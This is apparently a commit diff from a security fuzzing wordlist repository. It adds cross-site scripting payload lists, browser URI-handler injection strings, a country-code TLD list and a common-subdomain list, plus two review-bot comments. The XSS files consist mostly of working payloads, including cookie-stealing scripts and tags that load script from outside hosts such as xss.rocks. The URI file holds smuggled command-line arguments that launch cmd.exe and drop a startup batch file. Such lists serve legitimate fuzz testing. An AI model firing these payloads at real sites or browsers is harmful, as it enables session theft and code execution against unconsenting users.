<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<iframe src=http://xss.rocks/scriptlet.html <
|
||||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<iframe/src \/\/onload = prompt(1)
|
||||
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
<img src ?itworksonchrome?\/onerror = alert(1)???
|
||||
<IMG SRC= onmouseover="alert('xxs')">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<img src="/" =_=" title="onerror='prompt(1)'">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<img src="javascript:alert('XSS')">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<img src=`xx:xx`onerror=alert(1)>
|
||||
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||
<img src=x onerror="javascript:alert('XSS')">
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
||||
<input value=<><iframe/src=javascript:confirm(1)
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
||||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<object data=javascript:\u0061le%72t(1)>
|
||||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
||||
<script src="data:text/javascript,alert(1)"></script>
|
||||
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
||||
<script x> alert(1) </script 1=2
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<script/src=data:text/javascript,alert(1)></script> ?
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
||||
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
||||
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
||||
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
||||
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
||||
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
||||
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
||||
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
||||
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
||||
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
||||
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
||||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert('XSS');</script>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
||||
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
||||
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
<svg/onload=alert(1)
|
||||
<svg><script ?>alert(1)
|
||||
<svg><script onlypossibleinopera:-)> alert(1)
|
||||
<svg><script>//
confirm(1);</script </svg>
|
||||
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
||||
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
alert
|
||||
alert(1)
|
||||
alert(1)
|
||||
alert\\`1\\`
|
||||
alert`1`
|
||||
<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
http://www.<script>alert(1)</script .com
|
||||
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
javascript:alert%28/xss/%29
|
||||
javascript:alert(1)
|
||||
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
||||
x”</title><img src%3dx onerror%3dalert(1)>
|
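Review bot: Many entries in this file pull script or content from hosts the project does not control (`xss.rocks`, `xss.com`, `sternefamily.net`, `businessinfo.co.uk`, `corkami.googlecode.com`, `jsfiddle.net`, `xssme.html5sec.org`). When one of them fires, whatever that host serves at that moment runs in the application under test and in the tester's browser session. Nothing in the commit pins or documents what those URLs return, and domain ownership can change; the same applies to the `xss.rocks` references in `attack/xss/xss-rsnake.txt`. I would replace the host with a token the tester substitutes, e.g. `<SCRIPT SRC=//TESTER_CONTROLLED_HOST/xss.js>` (constructed placeholder), and describe the substitution in the directory README. Separately, `' or 2=2` and `" or 202` read like SQL-injection probes and may belong in a different list.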
78
attack/xss/xss-rsnake.txt
Normal file
|
@ -0,0 +1,78 @@
|
|||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
|
||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
|
||||
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://xss.rocks/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
|
||||
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http:/xss.rocks/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.rocks/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="xss.rocks/xss.js"></SCRIPT>
|
||||
|
||||
|
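--- a/attack/xss/xss-uri.txt
+++ b/attack/xss/xss-uri.txt
@@ -0,0 +1,6 @@
+aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
+firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
+navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
+res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
+firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
+navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)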
2463
discovery/UserAgent/UserAgents.txt
Normal file
File diff suppressed because it is too large
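--- a/discovery/dns/CcTLD.txt
+++ b/discovery/dns/CcTLD.txt
@@ -0,0 +1,257 @@
+ac
+ad
+ae
+af
+ag
+ai
+al
+am
+an
+ao
+aq
+ar
+as
+at
+au
+aw
+ax
+az
+ba
+bb
+bd
+be
+bf
+bg
+bh
+bi
+bj
+bl
+bm
+bn
+bo
+bq
+br
+bs
+bt
+bv
+bw
+by
+bz
+ca
+cc
+cd
+cf
+cg
+ch
+ci
+ck
+cl
+cm
+cn
+co
+cr
+cu
+cv
+cw
+cx
+cy
+cz
+dd
+de
+dj
+dk
+dm
+do
+dz
+ec
+ee
+eg
+eh
+er
+es
+et
+eu
+fi
+fj
+fk
+fm
+fo
+fr
+ga
+gb
+gd
+ge
+gf
+gg
+gh
+gi
+gl
+gm
+gn
+gp
+gq
+gr
+gs
+gt
+gu
+gw
+gy
+hk
+hm
+hn
+hr
+ht
+hu
+id
+ie
+il
+im
+in
+io
+iq
+ir
+is
+it
+je
+jm
+jo
+jp
+ke
+kg
+kh
+ki
+km
+kn
+kp
+kr
+kw
+ky
+kz
+la
+lb
+lc
+li
+lk
+lr
+ls
+lt
+lu
+lv
+ly
+ma
+mc
+md
+me
+mf
+mg
+mh
+mk
+ml
+mm
+mn
+mo
+mp
+mq
+mr
+ms
+mt
+mu
+mv
+mw
+mx
+my
+mz
+na
+nc
+ne
+nf
+ng
+ni
+nl
+no
+np
+nr
+nu
+nz
+om
+pa
+pe
+pf
+pg
+ph
+pk
+pl
+pm
+pn
+pr
+ps
+pt
+pw
+py
+qa
+re
+ro
+rs
+ru
+rw
+sa
+sb
+sc
+sd
+se
+sg
+sh
+si
+sj
+sk
+sl
+sm
+sn
+so
+sr
+ss
+st
+su
+sv
+sx
+sy
+sz
+tc
+td
+tf
+tg
+th
+tj
+tk
+tl
+tm
+tn
+to
+tp
+tr
+tt
+tv
+tw
+tz
+ua
+ug
+uk
+um
+us
+uy
+uz
+va
+vc
+ve
+vg
+vi
+vn
+vu
+wf
+ws
+ye
+yt
+yu
+za
+zm
+zw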
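Review bot: CcTLD.txt mixes currently delegated country codes with codes that are retired or were never delegated, for example `an`, `dd`, `tp` and `yu`, and nothing in the file or the commit says which is which. Anyone using the list to validate hostnames or to scope DNS monitoring will accept suffixes that do not resolve. The entries are the same two-letter form either way, so the difference cannot be seen from the file itself. A wordlist has no comment syntax, so I would document this in the directory README, e.g. `CcTLD.txt: includes retired and undelegated codes; check against the IANA root zone before using it for validation`.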
50000
discovery/dns/alexaTop1mAXFRcommonSubdomains.txt
Normal file
File diff suppressed because it is too large
989
discovery/dns/dnsmapCommonSubdomains.txt
Normal file
|
@ -0,0 +1,989 @@
|
|||
a
|
||||
aa
|
||||
ab
|
||||
ac
|
||||
access
|
||||
accounting
|
||||
accounts
|
||||
ad
|
||||
admin
|
||||
administrator
|
||||
ae
|
||||
af
|
||||
ag
|
||||
ah
|
||||
ai
|
||||
aix
|
||||
aj
|
||||
ak
|
||||
al
|
||||
am
|
||||
an
|
||||
ao
|
||||
ap
|
||||
apollo
|
||||
aq
|
||||
ar
|
||||
archivos
|
||||
as
|
||||
at
|
||||
au
|
||||
aula
|
||||
aulas
|
||||
av
|
||||
aw
|
||||
ax
|
||||
ay
|
||||
ayuda
|
||||
az
|
||||
b
|
||||
ba
|
||||
backup
|
||||
backups
|
||||
bart
|
||||
bb
|
||||
bc
|
||||
bd
|
||||
be
|
||||
beta
|
||||
bf
|
||||
bg
|
||||
bh
|
||||
bi
|
||||
biblioteca
|
||||
billing
|
||||
bj
|
||||
bk
|
||||
bl
|
||||
blackboard
|
||||
blog
|
||||
blogs
|
||||
bm
|
||||
bn
|
||||
bo
|
||||
bp
|
||||
bq
|
||||
br
|
||||
bs
|
||||
bsd
|
||||
bt
|
||||
bu
|
||||
bv
|
||||
bw
|
||||
bx
|
||||
by
|
||||
bz
|
||||
c
|
||||
ca
|
||||
carro
|
||||
cart
|
||||
cas
|
||||
catalog
|
||||
catalogo
|
||||
catalogue
|
||||
cb
|
||||
cc
|
||||
cd
|
||||
ce
|
||||
cf
|
||||
cg
|
||||
ch
|
||||
chat
|
||||
chimera
|
||||
chronos
|
||||
ci
|
||||
citrix
|
||||
cj
|
||||
ck
|
||||
cl
|
||||
classroom
|
||||
clientes
|
||||
clients
|
||||
cm
|
||||
cn
|
||||
co
|
||||
connect
|
||||
controller
|
||||
correoweb
|
||||
cp
|
||||
cpanel
|
||||
cq
|
||||
cr
|
||||
cs
|
||||
csg
|
||||
ct
|
||||
cu
|
||||
customers
|
||||
cv
|
||||
cw
|
||||
cx
|
||||
cy
|
||||
cz
|
||||
d
|
||||
da
|
||||
data
|
||||
db
|
||||
dbs
|
||||
dc
|
||||
dd
|
||||
de
|
||||
demo
|
||||
demon
|
||||
demostration
|
||||
descargas
|
||||
developers
|
||||
development
|
||||
df
|
||||
dg
|
||||
dh
|
||||
di
|
||||
diana
|
||||
directory
|
||||
dj
|
||||
dk
|
||||
dl
|
||||
dm
|
||||
dmz
|
||||
dn
|
||||
do
|
||||
domain
|
||||
domaincontroller
|
||||
domain-controller
|
||||
download
|
||||
downloads
|
||||
dp
|
||||
dq
|
||||
dr
|
||||
ds
|
||||
dt
|
||||
du
|
||||
dv
|
||||
dw
|
||||
dx
|
||||
dy
|
||||
dz
|
||||
e
|
||||
ea
|
||||
eaccess
|
||||
eb
|
||||
ec
|
||||
ed
|
||||
ee
|
||||
ef
|
||||
eg
|
||||
eh
|
||||
ei
|
||||
ej
|
||||
ejemplo
|
||||
ejemplos
|
||||
ek
|
||||
el
|
||||
em
|
||||
email
|
||||
en
|
||||
enrutador
|
||||
eo
|
||||
ep
|
||||
eq
|
||||
er
|
||||
es
|
||||
et
|
||||
eu
|
||||
ev
|
||||
eventos
|
||||
events
|
||||
ew
|
||||
ex
|
||||
example
|
||||
examples
|
||||
exchange
|
||||
extranet
|
||||
ey
|
||||
ez
|
||||
f
|
||||
fa
|
||||
fb
|
||||
fc
|
||||
fd
|
||||
fe
|
||||
ff
|
||||
fg
|
||||
fh
|
||||
fi
|
||||
files
|
||||
finance
|
||||
firewall
|
||||
fj
|
||||
fk
|
||||
fl
|
||||
fm
|
||||
fn
|
||||
fo
|
||||
foro
|
||||
foros
|
||||
forum
|
||||
forums
|
||||
fp
|
||||
fq
|
||||
fr
|
||||
freebsd
|
||||
fs
|
||||
ft
|
||||
ftp
|
||||
ftpd
|
||||
fu
|
||||
fv
|
||||
fw
|
||||
fx
|
||||
fy
|
||||
fz
|
||||
g
|
||||
ga
|
||||
galeria
|
||||
gallery
|
||||
gateway
|
||||
gb
|
||||
gc
|
||||
gd
|
||||
ge
|
||||
gf
|
||||
gg
|
||||
gh
|
||||
gi
|
||||
gilford
|
||||
gj
|
||||
gk
|
||||
gl
|
||||
gm
|
||||
gn
|
||||
go
|
||||
gp
|
||||
gq
|
||||
gr
|
||||
groups
|
||||
groupwise
|
||||
gs
|
||||
gt
|
||||
gu
|
||||
guest
|
||||
guia
|
||||
guide
|
||||
gv
|
||||
gw
|
||||
gx
|
||||
gy
|
||||
gz
|
||||
h
|
||||
ha
|
||||
hb
|
||||
hc
|
||||
hd
|
||||
he
|
||||
help
|
||||
helpdesk
|
||||
hera
|
||||
heracles
|
||||
hercules
|
||||
hf
|
||||
hg
|
||||
hh
|
||||
hi
|
||||
hj
|
||||
hk
|
||||
hl
|
||||
hm
|
||||
hn
|
||||
ho
|
||||
home
|
||||
homer
|
||||
hotspot
|
||||
hp
|
||||
hq
|
||||
hr
|
||||
